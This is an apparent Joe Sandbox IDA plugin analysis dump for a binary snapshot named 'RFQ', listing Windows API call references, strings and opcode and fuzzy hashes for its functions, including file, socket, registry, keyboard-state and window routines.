                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _memmove$_malloc
                                                                          • String ID:
                                                                          • API String ID: 1938898002-0
                                                                          • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                          • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                          Similarity
                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                          • String ID:
                                                                          • API String ID: 2737351978-0
                                                                          • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                          • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                          • __getptd.LIBCMT ref: 00415253
                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                          • _free.LIBCMT ref: 0041529E
                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Similarity
                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 3638380555-0
                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                          • API String ID: 3207048006-625585964
                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                          Similarity
                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                          • String ID:
                                                                          • API String ID: 2945290962-0
                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                          • String ID:
                                                                          • API String ID: 1457242333-0
                                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 780548581-3081909835
                                                                          • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                          • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                          • String ID:
                                                                          • API String ID: 4082120231-0
                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2027346449-0
                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetMenu.USER32 ref: 0047A703
                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3257027151-0
                                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastselect
                                                                          • String ID:
                                                                          • API String ID: 215497628-0
                                                                          • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                          • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00444633
                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                          • String ID:
                                                                          • API String ID: 2354583917-0
                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Similarity
                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                          • API String ID: 896007046-0
                                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                          • GetFocus.USER32 ref: 00448ACF
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                          • API String ID: 3429747543-0
                                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
